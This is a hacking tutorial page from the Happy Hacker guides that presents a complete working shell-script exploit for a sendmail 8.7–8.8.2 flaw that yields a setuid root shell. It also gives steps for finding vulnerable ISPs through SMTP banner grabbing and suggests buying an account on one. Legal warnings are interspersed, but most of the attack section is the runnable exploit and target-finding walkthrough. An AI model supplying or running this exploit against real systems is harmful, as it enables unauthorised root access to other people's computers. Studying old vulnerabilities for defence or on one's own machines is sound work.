What's New!

Chat with
Hackers

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 

Hacker
Wargames 

Meet the 
Happy Hacksters 

Help for 
Beginners 

Hacker 
Bookstore 

Humor 

It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front

Shell Programming: an Exploit Explained, continued...

AN EXPLOIT EXPLAINED   

        Here's a fun, simple, powerful shell script. This is a goodie that you might be able to use from your shell account to create a root shell for yourself on the computer where you have your shell.

==========================================================

Newbie note: A "root shell" allows you to do anything you wish to the computer you are on.

==========================================================

==========================================================

You can go to jail warning: In the US and many other countries, it is illegal even to just get a root shell on someone else's computer -- unless that person agrees to let you get root.

===========================================================

          If you are determined to test this shell script, there are ways to do this legally.  Number one, install some form of Unix on your home computer. The easiest to install is Red Hat Linux, available at http://www.redhat.com. The easiest to get exploits to run on is Debian Linux, at http://www.debian.org.  For other Linux sources, see the GTMHH "Linux!" at http://www.happyhacker.org. (Note: the exploit below only someone from inside a shell account for an ordinary user to get a root -- superuser -- sherll.)

        Make sure your Linux is running an outdated sendmail program, versions 8.7 through 8.8.2.

        Next set up user accounts on your home Linux box.  The command is "adduser."

        Then run this exploit from your user account on your home computer.  If you have the right version of sendmail, you will be amazed at how easy it is to break in.

        The other way to legally run this exploit is to get permission to break into someone else's computer.  Soon our Hacker Wargame will offer accounts on a newbie computer that will allow this exploit.

        Don't assume you can get away with running this script against a stranger's computer.  There is no way to be absolutely certain you won't get caught.

Besides, if you have to read this to learn how to break into a computer, you don't know enough to have even a hope of getting away with the crime.

        Once you try this exploit you will know how ridiculously easy it is to break into computers. If someone gets busted for breaking into a computer using this shell script, yeah, sure, the media will make out like the person who ran it is a genius.  But you are about to learn that a little kid could break into a computer that runs a vulnerable version of sendmail.  It's that easy.  So anyone who is in the know realizes that it doesn't take brains to break into a computer.  They will simply agree with Fatal Error that "To err is human; to get caught is just plain stupid."

        Here is how to break into a computer that runs sendmail 8.7 through 8.8.2 on the Linux and FreeBSD operating systems.

1) Look for an Internet service provider running a vulnerable version of sendmail. To do this, get the domain names of some ISPs from http://www.celestin.com/pocia. Another way to get ISP names is from people'semail addresses.

        Then try telnetting into their smtp (mail server) ports.  Use the command:

telnet fubar.com smtp

Trying 208.999.37.180...
Connected to fubar.com (208.999.37.180).
Escape character is '^]'.
220 lobo.net ESMTP

 

        Now there is a smart ISP.  They don't tell strangers what mail server program they run.  But pretty soon you will hit an ISP that is vulnerable.You will get a message like this:

telnet foominds.com smtp

Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700

        OK, we have a vulnerable version of sendmail.  But does it also have a vulnerable operating system?  You can find that out by telneting into the login:

telnet foominds.com

Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.


UNIX(r) System V Release 4.0 (zuni)

login:

        We struck out here -- maybe.  This exploit is guaranteed to work for Linux and FreeBSD running vulnerable versions of sendmail.  It may or may not work on this ISP.

        Let's say you find an ISP where this exploit is certain to work.  Your next step is to buy an account on this ISP.

===========================================================

You can go to jail warning:  The way I am showing you to break into a computer is GUARANTEED to get you caught.  Don't do this unless you have first gotten permission to try it out from the owner of your ISP.  If you discover your ISP is vulnerable, your best bet is not to break in.  Instead, politely tell tech support they are vulnerable, and offer to show them how to break in.  They might say "Yes, please show us how it's done"!  Then it will be OK to run this script.

===========================================================

        Now comes the fun part.  Give the command "pico s.sh" (or substitute your favorite editor for "pico".  That brings up an editor program.  Next, put in the following shell commands:

#
#
#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#
#
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>&gtleshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
"\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type:   /tmp/sh"

More shell programming --->>


Carolyn's most
popular book,
in 4th edition now!
For advanced
hacker studies,
read Carolyn's
Google Groups
Subscribe to Happy Hacker
Email:
Visit this group

 

Return to the index of Guides to (mostly) Harmless Hacking!

 © 2013 Happy Hacker All rights reserved.